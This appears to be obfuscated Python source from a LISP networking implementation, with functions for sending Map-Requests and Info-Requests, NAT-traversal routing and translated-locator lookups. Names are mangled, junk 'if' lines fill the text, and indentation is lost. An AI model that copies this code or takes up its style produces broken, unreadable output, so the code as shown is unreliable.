if 62 - 62: OoooooooOO - OoooooooOO / OoO0O00 - II111iiii . iIii1I11I1II1
if 2 - 2: O0 + o0oOOo0O0Ooo % OOooOOo . ooOoO0o % i1IIi
if 21 - 21: OoOoOO00 / OoooooooOO + I1Ii111 - IiII
def lisp_mac_input ( packet ) :
return ( packet )
if 62 - 62: Oo0Ooo % iII111i + OoooooooOO - I1ii11iIi11i % iII111i % iIii1I11I1II1
if 54 - 54: IiII + OoOoOO00 / II111iiii % i11iIiiIii . I1Ii111
if 69 - 69: i1IIi + ooOoO0o + Ii1I
if 88 - 88: OoOoOO00 + iII111i % O0 + OOooOOo / OoooooooOO / OOooOOo
if 95 - 95: ooOoO0o . Oo0Ooo % IiII + iII111i
if 16 - 16: I11i * OoO0O00 % o0oOOo0O0Ooo - O0 % II111iiii - I1IiiI
if 72 - 72: OoooooooOO * OoOoOO00 . OOooOOo + Ii1I . OOooOOo / II111iiii
if 8 - 8: i1IIi
if 1 - 1: OoOoOO00 . OoO0O00 . OoO0O00 * O0
def lisp_rate_limit_map_request ( dest ) :
O000oo = lisp_get_timestamp ( )
if 97 - 97: OoooooooOO % ooOoO0o . I1Ii111 / iII111i
if 59 - 59: II111iiii + O0 . I1ii11iIi11i . Oo0Ooo * OoO0O00
if 35 - 35: oO0o / I1Ii111 * OOooOOo + OoooooooOO . IiII
if 1 - 1: I1IiiI + I1Ii111 / OOooOOo . Ii1I . oO0o / I1ii11iIi11i
Ii1i1 = O000oo - lisp_no_map_request_rate_limit
if ( Ii1i1 < LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME ) :
Oo = int ( LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME - Ii1i1 )
dprint ( "No Rate-Limit Mode for another {} secs" . format ( Oo ) )
return ( False )
if 54 - 54: OOooOOo
if 86 - 86: oO0o * Oo0Ooo / OOooOOo
if 18 - 18: II111iiii - I1Ii111
if 13 - 13: i11iIiiIii - O0 % OoOoOO00 + OOooOOo * ooOoO0o
if 55 - 55: i1IIi - OOooOOo / I11i * Ii1I
if ( lisp_last_map_request_sent == None ) : return ( False )
Ii1i1 = O000oo - lisp_last_map_request_sent
o000oO0O0ooo = ( Ii1i1 < LISP_MAP_REQUEST_RATE_LIMIT )
if 20 - 20: OoOoOO00 * iIii1I11I1II1 % O0 - i1IIi
if ( o000oO0O0ooo ) :
dprint ( "Rate-limiting Map-Request for {}, sent {} secs ago" . format ( green ( dest . print_address ( ) , False ) , round ( Ii1i1 , 3 ) ) )
if 51 - 51: I1ii11iIi11i * Ii1I - oO0o / O0 * OoooooooOO
if 12 - 12: i1IIi / iIii1I11I1II1 / O0 * OoO0O00
return ( o000oO0O0ooo )
if 15 - 15: i11iIiiIii / IiII + Ii1I % OOooOOo % I1ii11iIi11i * oO0o
if 24 - 24: OOooOOo / OOooOOo + I11i / iII111i . oO0o - iII111i
if 59 - 59: I1ii11iIi11i % II111iiii - i11iIiiIii - I1Ii111
if 34 - 34: II111iiii + iII111i / IiII
if 47 - 47: OoO0O00
if 40 - 40: o0oOOo0O0Ooo / iII111i . o0oOOo0O0Ooo
if 63 - 63: o0oOOo0O0Ooo * iIii1I11I1II1 * II111iiii . OoO0O00 - oO0o / OoOoOO00
def lisp_send_map_request ( lisp_sockets , lisp_ephem_port , seid , deid , rloc ,
pubsub = False ) :
global lisp_last_map_request_sent
if 78 - 78: i11iIiiIii / OoO0O00 / i1IIi . i11iIiiIii
if 100 - 100: II111iiii . IiII . I11i
if 60 - 60: OoOoOO00 % OOooOOo * i1IIi
if 3 - 3: OoooooooOO
if 75 - 75: OoooooooOO * I1Ii111 * o0oOOo0O0Ooo + I1ii11iIi11i . iIii1I11I1II1 / O0
if 23 - 23: oO0o - O0 * IiII + i11iIiiIii * Ii1I
I1ii1 = OOO00OOOO0O0o = None
if ( rloc ) :
I1ii1 = rloc . rloc
OOO00OOOO0O0o = rloc . translated_port if lisp_i_am_rtr else LISP_DATA_PORT
if 37 - 37: I1ii11iIi11i * IiII
if 65 - 65: OOooOOo / O0 . I1ii11iIi11i % i1IIi % Oo0Ooo
if 36 - 36: i11iIiiIii - OOooOOo + iII111i + iII111i * I11i * oO0o
if 14 - 14: O0 - iII111i * I1Ii111 - I1IiiI + IiII
if 46 - 46: OoooooooOO * OoO0O00 . I1Ii111
O0oo0OoOo0oOooOO , iio0OOOooooOOOo , OoO0 = lisp_myrlocs
if ( O0oo0OoOo0oOooOO == None ) :
lprint ( "Suppress sending Map-Request, IPv4 RLOC not found" )
return
if 89 - 89: ooOoO0o + O0
if ( iio0OOOooooOOOo == None and I1ii1 != None and I1ii1 . is_ipv6 ( ) ) :
lprint ( "Suppress sending Map-Request, IPv6 RLOC not found" )
return
if 2 - 2: I1IiiI + Oo0Ooo . iII111i
if 1 - 1: i11iIiiIii * OoO0O00 - OoooooooOO + OoooooooOO
O0Ooo = lisp_map_request ( )
O0Ooo . record_count = 1
O0Ooo . nonce = lisp_get_control_nonce ( )
O0Ooo . rloc_probe = ( I1ii1 != None )
O0Ooo . subscribe_bit = pubsub
O0Ooo . xtr_id_present = pubsub
if 31 - 31: OoooooooOO - OoOoOO00 * II111iiii % ooOoO0o - ooOoO0o / i11iIiiIii
if 8 - 8: I1IiiI . i1IIi - I11i
if 85 - 85: OOooOOo * IiII % O0 / I1ii11iIi11i
if 17 - 17: Oo0Ooo / i11iIiiIii / I11i - I1Ii111
if 3 - 3: I1Ii111 - Oo0Ooo / iIii1I11I1II1
if 71 - 71: o0oOOo0O0Ooo + i11iIiiIii + OoooooooOO % OoOoOO00 - I1ii11iIi11i / OoooooooOO
if 26 - 26: II111iiii
if ( rloc ) : rloc . last_rloc_probe_nonce = O0Ooo . nonce
if 41 - 41: Oo0Ooo . OoOoOO00 . iII111i / i11iIiiIii
I1iiIiI1II1ii = deid . is_multicast_address ( )
if ( I1iiIiI1II1ii ) :
O0Ooo . target_eid = seid
O0Ooo . target_group = deid
else :
O0Ooo . target_eid = deid
if 65 - 65: iII111i * o0oOOo0O0Ooo * OoooooooOO + I11i + oO0o % OoO0O00
if 1 - 1: I1ii11iIi11i . ooOoO0o
if 54 - 54: OoOoOO00 % I1IiiI . ooOoO0o + IiII / i11iIiiIii / o0oOOo0O0Ooo
if 51 - 51: OoOoOO00 / Ii1I . I1IiiI / Ii1I . II111iiii - iIii1I11I1II1
if 78 - 78: I11i
if 42 - 42: Ii1I
if 50 - 50: iIii1I11I1II1 / Ii1I . ooOoO0o / ooOoO0o * OoOoOO00 * iII111i
if 15 - 15: o0oOOo0O0Ooo % II111iiii + I1IiiI
if 21 - 21: I1ii11iIi11i - ooOoO0o
if ( O0Ooo . rloc_probe == False ) :
II1II1Iii1I = lisp_get_signature_eid ( )
if ( II1II1Iii1I ) :
O0Ooo . signature_eid . copy_address ( II1II1Iii1I . eid )
O0Ooo . privkey_filename = "./lisp-sig.pem"
if 81 - 81: iII111i / i11iIiiIii / I1Ii111
if 70 - 70: I1ii11iIi11i / i11iIiiIii
if 90 - 90: II111iiii / OoOoOO00 . Ii1I . OoooooooOO
if 76 - 76: OoooooooOO
if 78 - 78: IiII % i11iIiiIii
if 23 - 23: iIii1I11I1II1 - o0oOOo0O0Ooo - Ii1I % OOooOOo
if ( seid == None or I1iiIiI1II1ii ) :
O0Ooo . source_eid . afi = LISP_AFI_NONE
else :
O0Ooo . source_eid = seid
if 100 - 100: oO0o . OoO0O00 . i11iIiiIii % II111iiii * IiII
if 81 - 81: OOooOOo - OOooOOo + OoOoOO00
if 19 - 19: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 + iIii1I11I1II1 % I1IiiI + ooOoO0o
if 86 - 86: o0oOOo0O0Ooo * i11iIiiIii - I11i
if 71 - 71: OoO0O00 - I11i
if 96 - 96: I1Ii111 / Ii1I
if 65 - 65: I1ii11iIi11i * O0 . IiII
if 11 - 11: I11i / Ii1I % oO0o
if 50 - 50: i11iIiiIii
if 93 - 93: i1IIi / Ii1I * II111iiii - Oo0Ooo . OoOoOO00 - OOooOOo
if 25 - 25: I11i / ooOoO0o % ooOoO0o - OOooOOo
if ( I1ii1 != None and lisp_nat_traversal and lisp_i_am_rtr == False ) :
if ( I1ii1 . is_private_address ( ) == False ) :
O0oo0OoOo0oOooOO = lisp_get_any_translated_rloc ( )
if 59 - 59: I1IiiI + o0oOOo0O0Ooo . iIii1I11I1II1 - O0 - i11iIiiIii
if ( O0oo0OoOo0oOooOO == None ) :
lprint ( "Suppress sending Map-Request, translated RLOC not found" )
return
if 4 - 4: I1IiiI
if 36 - 36: Ii1I
if 76 - 76: i11iIiiIii + i1IIi
if 56 - 56: OoOoOO00 + II111iiii / i11iIiiIii * OoOoOO00 * OoooooooOO
if 15 - 15: OoOoOO00 / OoooooooOO + OOooOOo
if 76 - 76: Ii1I * iII111i . OoooooooOO
if 92 - 92: iIii1I11I1II1 - Oo0Ooo - I1IiiI - OOooOOo * I1Ii111
if 44 - 44: I1Ii111 - II111iiii / OOooOOo
if ( I1ii1 == None or I1ii1 . is_ipv4 ( ) ) :
if ( lisp_nat_traversal and I1ii1 == None ) :
i1II1 = lisp_get_any_translated_rloc ( )
if ( i1II1 != None ) : O0oo0OoOo0oOooOO = i1II1
if 21 - 21: Ii1I + Ii1I
O0Ooo . itr_rlocs . append ( O0oo0OoOo0oOooOO )
if 41 - 41: II111iiii / II111iiii / iII111i * I1IiiI * I1Ii111 * oO0o
if ( I1ii1 == None or I1ii1 . is_ipv6 ( ) ) :
if ( iio0OOOooooOOOo == None or iio0OOOooooOOOo . is_ipv6_link_local ( ) ) :
iio0OOOooooOOOo = None
else :
O0Ooo . itr_rloc_count = 1 if ( I1ii1 == None ) else 0
O0Ooo . itr_rlocs . append ( iio0OOOooooOOOo )
if 2 - 2: OoOoOO00 - I1ii11iIi11i * I1IiiI * Ii1I
if 41 - 41: OoOoOO00 . OOooOOo / OoOoOO00 % iIii1I11I1II1
if 47 - 47: ooOoO0o . i11iIiiIii / OoO0O00
if 48 - 48: O0
if 89 - 89: i11iIiiIii % OoO0O00 . OoOoOO00 + Oo0Ooo + OoOoOO00
if 53 - 53: Ii1I / OoOoOO00 % iII111i * OoooooooOO + Oo0Ooo
if 70 - 70: OoO0O00 % OoO0O00 * OoooooooOO
if 96 - 96: ooOoO0o * Ii1I + I11i + II111iiii * I1IiiI / iII111i
if 40 - 40: OoooooooOO - I11i % OOooOOo - I1IiiI . I1IiiI + Ii1I
if ( I1ii1 != None and O0Ooo . itr_rlocs != [ ] ) :
o0OO = O0Ooo . itr_rlocs [ 0 ]
else :
if ( deid . is_ipv4 ( ) ) :
o0OO = O0oo0OoOo0oOooOO
elif ( deid . is_ipv6 ( ) ) :
o0OO = iio0OOOooooOOOo
else :
o0OO = O0oo0OoOo0oOooOO
if 97 - 97: OOooOOo . OoooooooOO . OOooOOo . i11iIiiIii
if 71 - 71: oO0o + I1ii11iIi11i * I1ii11iIi11i
if 79 - 79: oO0o
if 47 - 47: OoooooooOO - i1IIi * OOooOOo
if 11 - 11: I11i / OOooOOo . o0oOOo0O0Ooo - O0 * OoooooooOO % iII111i
if 7 - 7: OoOoOO00 . IiII + OoooooooOO - I1Ii111 / oO0o
OO0Oo00OO0oo = O0Ooo . encode ( I1ii1 , OOO00OOOO0O0o )
O0Ooo . print_map_request ( )
if 32 - 32: iIii1I11I1II1 + I11i + OOooOOo - OoooooooOO + i11iIiiIii * o0oOOo0O0Ooo
if 8 - 8: iII111i
if 10 - 10: OoOoOO00 % I11i
if 49 - 49: oO0o % ooOoO0o + II111iiii
if 21 - 21: i1IIi + OoO0O00 . I1IiiI - Oo0Ooo
if 99 - 99: OoOoOO00
if ( I1ii1 != None ) :
if ( rloc . is_rloc_translated ( ) ) :
i1II11 = lisp_get_nat_info ( I1ii1 , rloc . rloc_name )
if 46 - 46: I1ii11iIi11i / II111iiii / OoooooooOO / Ii1I
if 37 - 37: I1ii11iIi11i - Ii1I / oO0o . I1IiiI % I1Ii111
if 8 - 8: oO0o
if 46 - 46: I1Ii111 + IiII + II111iiii . o0oOOo0O0Ooo + i11iIiiIii
if ( i1II11 == None ) :
I1I1iIiiiiII11 = rloc . rloc . print_address_no_iid ( )
o0O0Ooo = "gleaned-{}" . format ( I1I1iIiiiiII11 )
o00oo = rloc . translated_port
i1II11 = lisp_nat_info ( I1I1iIiiiiII11 , o0O0Ooo , o00oo )
if 97 - 97: o0oOOo0O0Ooo % OoOoOO00 * O0 / iIii1I11I1II1 * OoO0O00 / i11iIiiIii
lisp_encapsulate_rloc_probe ( lisp_sockets , I1ii1 , i1II11 ,
OO0Oo00OO0oo )
return
if 1 - 1: OoooooooOO . Ii1I
if 68 - 68: Ii1I
Oo0o = I1ii1 . print_address_no_iid ( )
OooOOooo = lisp_convert_4to6 ( Oo0o )
lisp_send ( lisp_sockets , OooOOooo , LISP_CTRL_PORT , OO0Oo00OO0oo )
return
if 98 - 98: iII111i
if 33 - 33: OoO0O00 - ooOoO0o % O0 % iIii1I11I1II1 * iII111i - iII111i
if 27 - 27: i11iIiiIii + I1ii11iIi11i + i1IIi
if 67 - 67: o0oOOo0O0Ooo
if 58 - 58: IiII % o0oOOo0O0Ooo + i1IIi
if 33 - 33: II111iiii
oOoOOoOOOOO0 = None if lisp_i_am_rtr else seid
if ( lisp_decent_pull_xtr_configured ( ) ) :
iii1i = lisp_get_decent_map_resolver ( deid )
else :
iii1i = lisp_get_map_resolver ( None , oOoOOoOOOOO0 )
if 57 - 57: i1IIi + I11i % Oo0Ooo - i11iIiiIii - I1IiiI * OOooOOo
if ( iii1i == None ) :
lprint ( "Cannot find Map-Resolver for source-EID {}" . format ( green ( seid . print_address ( ) , False ) ) )
if 66 - 66: iIii1I11I1II1 + IiII + ooOoO0o
return
if 64 - 64: ooOoO0o + Oo0Ooo
iii1i . last_used = lisp_get_timestamp ( )
iii1i . map_requests_sent += 1
if ( iii1i . last_nonce == 0 ) : iii1i . last_nonce = O0Ooo . nonce
if 27 - 27: i11iIiiIii * I1Ii111 . o0oOOo0O0Ooo - iIii1I11I1II1 % Oo0Ooo % I1IiiI
if 75 - 75: iII111i
if 6 - 6: iII111i / OoOoOO00 / i11iIiiIii - o0oOOo0O0Ooo
if 35 - 35: ooOoO0o / I1Ii111 / I1Ii111
if ( seid == None ) : seid = o0OO
lisp_send_ecm ( lisp_sockets , OO0Oo00OO0oo , seid , lisp_ephem_port , deid ,
iii1i . map_resolver )
if 19 - 19: OoO0O00 % i11iIiiIii % iIii1I11I1II1
if 100 - 100: OOooOOo . oO0o % ooOoO0o * ooOoO0o . I1Ii111 - oO0o
if 33 - 33: Oo0Ooo . i1IIi - OoooooooOO
if 14 - 14: I1Ii111 + Oo0Ooo
lisp_last_map_request_sent = lisp_get_timestamp ( )
if 35 - 35: i11iIiiIii * Ii1I
if 100 - 100: O0 . iII111i / iIii1I11I1II1
if 47 - 47: ooOoO0o + OoOoOO00
if 67 - 67: IiII - I1ii11iIi11i * i1IIi - ooOoO0o
iii1i . resolve_dns_name ( )
return
if 91 - 91: I11i
if 54 - 54: I1ii11iIi11i / i1IIi
if 14 - 14: iIii1I11I1II1 * I11i . I11i * ooOoO0o * iII111i
if 60 - 60: iIii1I11I1II1 + i1IIi + oO0o - iIii1I11I1II1 . i11iIiiIii * OoooooooOO
if 23 - 23: iII111i - IiII % i11iIiiIii
if 81 - 81: OoooooooOO % OoOoOO00 / IiII / OoooooooOO + i1IIi - O0
if 60 - 60: OOooOOo - I1Ii111 * Oo0Ooo
if 9 - 9: OoooooooOO * OOooOOo % OoO0O00 - ooOoO0o + Ii1I
def lisp_send_info_request ( lisp_sockets , dest , port , device_name ) :
if 39 - 39: iIii1I11I1II1 / i1IIi % I11i % I1ii11iIi11i * IiII
if 11 - 11: II111iiii + i1IIi
if 1 - 1: OOooOOo
if 23 - 23: i1IIi + OoooooooOO * OOooOOo . Oo0Ooo
oOOOoO0o00 = lisp_info ( )
oOOOoO0o00 . nonce = lisp_get_control_nonce ( )
if ( device_name ) : oOOOoO0o00 . hostname += "-" + device_name
if 77 - 77: I1Ii111 * O0 - IiII
Oo0o = dest . print_address_no_iid ( )
if 21 - 21: Oo0Ooo % Oo0Ooo % Oo0Ooo
if 15 - 15: I1IiiI + OoO0O00 . I1IiiI / OoO0O00 . o0oOOo0O0Ooo
if 72 - 72: IiII + oO0o * o0oOOo0O0Ooo
if 39 - 39: O0 + iII111i + ooOoO0o / iIii1I11I1II1
if 91 - 91: Ii1I
if 62 - 62: I1Ii111 . iIii1I11I1II1 - Ii1I * I1ii11iIi11i % I11i % i1IIi
if 72 - 72: oO0o
if 3 - 3: ooOoO0o - Oo0Ooo / iII111i
if 40 - 40: IiII + oO0o
if 95 - 95: I1Ii111 % OOooOOo + Ii1I * i11iIiiIii + i11iIiiIii
if 27 - 27: i11iIiiIii - iIii1I11I1II1 % I1Ii111
if 10 - 10: i11iIiiIii - Ii1I - OoooooooOO % II111iiii
if 42 - 42: OoOoOO00 + iII111i % Oo0Ooo
if 25 - 25: IiII % O0 * I11i * OoOoOO00 / OoooooooOO
if 80 - 80: I1IiiI . oO0o - I1IiiI - OoOoOO00 * ooOoO0o / O0
if 54 - 54: Oo0Ooo % iIii1I11I1II1 * Oo0Ooo
oOOoOOO0 = False
if ( device_name ) :
Ii11IIi1i1ii = lisp_get_host_route_next_hop ( Oo0o )
if 32 - 32: i11iIiiIii * I1IiiI * OOooOOo . I1ii11iIi11i % o0oOOo0O0Ooo % i11iIiiIii
if 17 - 17: i11iIiiIii % OoooooooOO + I1IiiI
if 27 - 27: I1ii11iIi11i . OOooOOo + I11i
if 66 - 66: O0 . OoooooooOO . I1Ii111 . I11i - o0oOOo0O0Ooo
if 53 - 53: oO0o . I1Ii111 + OoOoOO00 - iIii1I11I1II1 % IiII
if 88 - 88: o0oOOo0O0Ooo * II111iiii % Oo0Ooo * I1ii11iIi11i . I1IiiI % I1ii11iIi11i
if 37 - 37: OOooOOo % OoO0O00 % oO0o . I11i / OOooOOo
if 8 - 8: iIii1I11I1II1 + O0 + IiII - IiII * I1Ii111 / i1IIi
if 10 - 10: Oo0Ooo . i11iIiiIii + iIii1I11I1II1 % iII111i + i11iIiiIii
if ( port == LISP_CTRL_PORT and Ii11IIi1i1ii != None ) :
while ( True ) :
time . sleep ( .01 )
Ii11IIi1i1ii = lisp_get_host_route_next_hop ( Oo0o )
if ( Ii11IIi1i1ii == None ) : break
if 6 - 6: OoOoOO00 + OOooOOo + Oo0Ooo
if 43 - 43: IiII * iII111i . ooOoO0o / I1ii11iIi11i . ooOoO0o * II111iiii
if 30 - 30: iII111i
o0O00Oo = lisp_get_default_route_next_hops ( )
for OoO0 , ooOoOoO00OO0oooo in o0O00Oo :
if ( OoO0 != device_name ) : continue
if 85 - 85: Ii1I + I1ii11iIi11i % II111iiii . Ii1I % oO0o / OoOoOO00
if 70 - 70: ooOoO0o . I1Ii111 / Oo0Ooo
if 58 - 58: Ii1I / OoooooooOO
if 98 - 98: OoOoOO00 . II111iiii + Ii1I % OoO0O00
if 89 - 89: Ii1I % OoooooooOO - OoOoOO00 - o0oOOo0O0Ooo
if 48 - 48: OoO0O00 - iII111i
if ( Ii11IIi1i1ii != ooOoOoO00OO0oooo ) :
if ( Ii11IIi1i1ii != None ) :
lisp_install_host_route ( Oo0o , Ii11IIi1i1ii , False )
if 8 - 8: I11i
lisp_install_host_route ( Oo0o , ooOoOoO00OO0oooo , True )
oOOoOOO0 = True
if 42 - 42: ooOoO0o - OOooOOo . iII111i
break
if 44 - 44: I1ii11iIi11i % OoOoOO00 * Ii1I * iIii1I11I1II1
if 36 - 36: I1ii11iIi11i + I1Ii111 - iIii1I11I1II1 / I1ii11iIi11i / i1IIi
if 21 - 21: IiII % oO0o
if 82 - 82: O0 . OoOoOO00 * Oo0Ooo
if 69 - 69: OoOoOO00 % I1ii11iIi11i % II111iiii * oO0o
if 100 - 100: i11iIiiIii . IiII - I1IiiI + I1Ii111
OO0Oo00OO0oo = oOOOoO0o00 . encode ( )
oOOOoO0o00 . print_info ( )
if 29 - 29: Oo0Ooo . I1IiiI % ooOoO0o * I1ii11iIi11i . iII111i
if 14 - 14: OoOoOO00 - O0 % Ii1I
if 19 - 19: iII111i / i1IIi * O0 - OoO0O00
if 8 - 8: I1ii11iIi11i / oO0o - OoooooooOO + ooOoO0o + o0oOOo0O0Ooo % i11iIiiIii
ii111II = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
ii111II = bold ( ii111II , False )
o00oo = bold ( "{}" . format ( port ) , False )
OoOOOO = red ( Oo0o , False )
i1I1IIIi11I = "RTR " if port == LISP_DATA_PORT else "MS "
lprint ( "Send Info-Request to {}{}, port {} {}" . format ( i1I1IIIi11I , OoOOOO , o00oo , ii111II ) )
if 24 - 24: iII111i - iIii1I11I1II1 + I11i % i1IIi - Oo0Ooo
if 26 - 26: iIii1I11I1II1 + OoooooooOO - OOooOOo . I1ii11iIi11i % OoooooooOO
if 76 - 76: i11iIiiIii / Ii1I - OoooooooOO + II111iiii * OoO0O00
if 77 - 77: ooOoO0o * I11i
if 85 - 85: OoO0O00 * I1Ii111 - OoooooooOO / iIii1I11I1II1 - i1IIi + Ii1I
if 76 - 76: iII111i * OoooooooOO
if ( port == LISP_CTRL_PORT ) :
lisp_send ( lisp_sockets , dest , LISP_CTRL_PORT , OO0Oo00OO0oo )
else :
i111ii1II11ii = lisp_data_header ( )
i111ii1II11ii . instance_id ( 0xffffff )
i111ii1II11ii = i111ii1II11ii . encode ( )
if ( i111ii1II11ii ) :
OO0Oo00OO0oo = i111ii1II11ii + OO0Oo00OO0oo
if 49 - 49: II111iiii - OOooOOo + II111iiii + OoOoOO00
if 51 - 51: i11iIiiIii
if 39 - 39: o0oOOo0O0Ooo % I1Ii111 % i1IIi - II111iiii + i11iIiiIii
if 62 - 62: I1ii11iIi11i - I1IiiI * i11iIiiIii % oO0o
if 63 - 63: II111iiii - Oo0Ooo
if 55 - 55: iIii1I11I1II1 / O0 * O0 * i11iIiiIii * OoooooooOO
if 94 - 94: II111iiii . II111iiii / OoOoOO00 % oO0o * i1IIi % Oo0Ooo
if 78 - 78: IiII - I1IiiI
if 59 - 59: oO0o + i1IIi - IiII % OOooOOo % iIii1I11I1II1
lisp_send ( lisp_sockets , dest , LISP_DATA_PORT , OO0Oo00OO0oo )
if 71 - 71: OoO0O00
if 72 - 72: II111iiii + o0oOOo0O0Ooo / i1IIi * Oo0Ooo / i1IIi
if 52 - 52: I1Ii111 % OoO0O00 . I1Ii111 * I1ii11iIi11i * OoOoOO00 + i1IIi
if 54 - 54: Ii1I / I1IiiI
if 7 - 7: iIii1I11I1II1 . O0 + OOooOOo . Ii1I * Oo0Ooo
if 25 - 25: I1Ii111 . Oo0Ooo % II111iiii . IiII - O0
if 18 - 18: oO0o * OOooOOo
if ( oOOoOOO0 ) :
lisp_install_host_route ( Oo0o , None , False )
if ( Ii11IIi1i1ii != None ) : lisp_install_host_route ( Oo0o , Ii11IIi1i1ii , True )
if 19 - 19: iIii1I11I1II1 / I1ii11iIi11i - I1ii11iIi11i / iIii1I11I1II1
return
if 42 - 42: iIii1I11I1II1 / OOooOOo - O0 * OoooooooOO / i1IIi
if 33 - 33: OOooOOo . o0oOOo0O0Ooo % OoO0O00 - I1Ii111 . OoooooooOO
if 96 - 96: II111iiii % I11i / Ii1I - i11iIiiIii
if 63 - 63: I1IiiI
if 15 - 15: iIii1I11I1II1 - I1ii11iIi11i % OoO0O00 * II111iiii / I11i + I11i
if 23 - 23: I1IiiI
if 51 - 51: i11iIiiIii / ooOoO0o - OoooooooOO + OoOoOO00 + oO0o
def lisp_process_info_request ( lisp_sockets , packet , addr_str , sport , rtr_list ) :
if 57 - 57: iIii1I11I1II1
if 19 - 19: Ii1I / o0oOOo0O0Ooo + O0 / iIii1I11I1II1 + II111iiii
if 3 - 3: oO0o % OoO0O00 % OOooOOo
if 64 - 64: o0oOOo0O0Ooo . II111iiii * IiII % Oo0Ooo + I11i - OoooooooOO
oOOOoO0o00 = lisp_info ( )
packet = oOOOoO0o00 . decode ( packet )
if ( packet == None ) : return
oOOOoO0o00 . print_info ( )
if 58 - 58: ooOoO0o
if 15 - 15: O0 * OOooOOo * I11i + Ii1I * OoooooooOO + OOooOOo
if 77 - 77: O0
if 98 - 98: iII111i - iII111i % i1IIi - I1Ii111 . I1IiiI % o0oOOo0O0Ooo
if 38 - 38: IiII % OoOoOO00 . OOooOOo . I1ii11iIi11i
oOOOoO0o00 . info_reply = True
oOOOoO0o00 . global_etr_rloc . store_address ( addr_str )
oOOOoO0o00 . etr_port = sport
if 34 - 34: iII111i . i11iIiiIii + OoO0O00 + o0oOOo0O0Ooo / ooOoO0o - i11iIiiIii
if 63 - 63: ooOoO0o % OoO0O00 % ooOoO0o
if 28 - 28: IiII * I1Ii111 * o0oOOo0O0Ooo + ooOoO0o - IiII / IiII
if 73 - 73: iIii1I11I1II1 . I1ii11iIi11i + OOooOOo
if 51 - 51: I11i % Oo0Ooo * OOooOOo % OoooooooOO - OoOoOO00 % Ii1I
if ( oOOOoO0o00 . hostname != None ) :
oOOOoO0o00 . private_etr_rloc . afi = LISP_AFI_NAME
oOOOoO0o00 . private_etr_rloc . store_address ( oOOOoO0o00 . hostname )
if 60 - 60: OoOoOO00 - IiII + OoO0O00
if 77 - 77: iIii1I11I1II1
if ( rtr_list != None ) : oOOOoO0o00 . rtr_list = rtr_list
packet = oOOOoO0o00 . encode ( )
oOOOoO0o00 . print_info ( )
if 92 - 92: IiII
if 68 - 68: OOooOOo . IiII / iIii1I11I1II1 % i11iIiiIii
if 74 - 74: iII111i + i11iIiiIii
if 95 - 95: Ii1I
if 49 - 49: I1ii11iIi11i . i1IIi + OoO0O00 % O0 + OoO0O00
lprint ( "Send Info-Reply to {}" . format ( red ( addr_str , False ) ) )
OooOOooo = lisp_convert_4to6 ( addr_str )
lisp_send ( lisp_sockets , OooOOooo , sport , packet )
if 21 - 21: ooOoO0o * oO0o / OoooooooOO % ooOoO0o / O0
if 24 - 24: OoO0O00 - i11iIiiIii / i11iIiiIii * I1Ii111
if 20 - 20: IiII % iIii1I11I1II1 . iII111i + iIii1I11I1II1 + O0
if 96 - 96: I1ii11iIi11i - IiII % OoooooooOO . iII111i
if 30 - 30: Oo0Ooo . OoooooooOO / Oo0Ooo / oO0o
IIiIIiiI11 = lisp_info_source ( oOOOoO0o00 . hostname , addr_str , sport )
IIiIIiiI11 . cache_address_for_info_source ( )
return
if 92 - 92: I1IiiI + oO0o % iII111i
if 47 - 47: ooOoO0o . OOooOOo . oO0o + oO0o + i1IIi + iIii1I11I1II1
if 93 - 93: I1IiiI - i11iIiiIii * I1Ii111 - O0 + iII111i
if 11 - 11: iII111i
if 100 - 100: OoooooooOO / ooOoO0o . OoO0O00
if 89 - 89: I11i % II111iiii
if 35 - 35: oO0o
if 65 - 65: II111iiii
def lisp_get_signature_eid ( ) :
for II1II1Iii1I in lisp_db_list :
if ( II1II1Iii1I . signature_eid ) : return ( II1II1Iii1I )
if 87 - 87: oO0o / OoO0O00 - oO0o
return ( None )
if 69 - 69: i11iIiiIii
if 29 - 29: IiII . ooOoO0o / iII111i - OOooOOo / OOooOOo % Oo0Ooo
if 42 - 42: OoO0O00 . I1Ii111 . I1IiiI + Oo0Ooo * O0
if 35 - 35: Oo0Ooo / iII111i - O0 - OOooOOo * Oo0Ooo . i11iIiiIii
if 43 - 43: OoOoOO00 % oO0o % OoO0O00 / Ii1I . I11i
if 86 - 86: I1Ii111 * i1IIi + IiII - OoOoOO00
if 14 - 14: I1ii11iIi11i / i11iIiiIii * I11i % o0oOOo0O0Ooo + IiII / I1ii11iIi11i
if 82 - 82: OOooOOo . oO0o
def lisp_get_any_translated_port ( ) :
for II1II1Iii1I in lisp_db_list :
for iII in II1II1Iii1I . rloc_set :
if ( iII . translated_rloc . is_null ( ) ) : continue
return ( iII . translated_port )
if 12 - 12: i11iIiiIii + II111iiii
if 49 - 49: OoooooooOO
return ( None )
if 48 - 48: i1IIi . IiII - O0 + OoooooooOO
if 6 - 6: I1Ii111 * OOooOOo + o0oOOo0O0Ooo . I1ii11iIi11i * I1Ii111
if 6 - 6: oO0o / II111iiii
if 23 - 23: IiII - OoooooooOO / oO0o
if 69 - 69: O0 - OoooooooOO
if 31 - 31: o0oOOo0O0Ooo . i1IIi - i1IIi % i1IIi - iIii1I11I1II1
if 50 - 50: IiII - OOooOOo % OoOoOO00
if 66 - 66: IiII * i11iIiiIii
if 64 - 64: i11iIiiIii . I1Ii111 % i11iIiiIii % I11i
def lisp_get_any_translated_rloc ( ) :
for II1II1Iii1I in lisp_db_list :
for iII in II1II1Iii1I . rloc_set :
if ( iII . translated_rloc . is_null ( ) ) : continue
return ( iII . translated_rloc )
if 56 - 56: o0oOOo0O0Ooo + ooOoO0o + OoooooooOO
if 64 - 64: OOooOOo / OoOoOO00
return ( None )
if 30 - 30: OOooOOo % I1Ii111 - i11iIiiIii
if 20 - 20: i1IIi * I11i / OoO0O00 / i1IIi / I1Ii111 * O0
if 95 - 95: Ii1I + Ii1I % IiII - IiII / OOooOOo
if 46 - 46: IiII + iII111i + II111iiii . iII111i - i11iIiiIii % OoO0O00
if 24 - 24: oO0o + IiII . o0oOOo0O0Ooo . OoooooooOO . i11iIiiIii / I1ii11iIi11i
if 49 - 49: IiII
if 1 - 1: oO0o / I11i
def lisp_get_all_translated_rlocs ( ) :
OOO0O0Oo0O0 = [ ]
for II1II1Iii1I in lisp_db_list :
for iII in II1II1Iii1I . rloc_set :
if ( iII . is_rloc_translated ( ) == False ) : continue
oOOOo0o = iII . translated_rloc . print_address_no_iid ( )
OOO0O0Oo0O0 . append ( oOOOo0o )
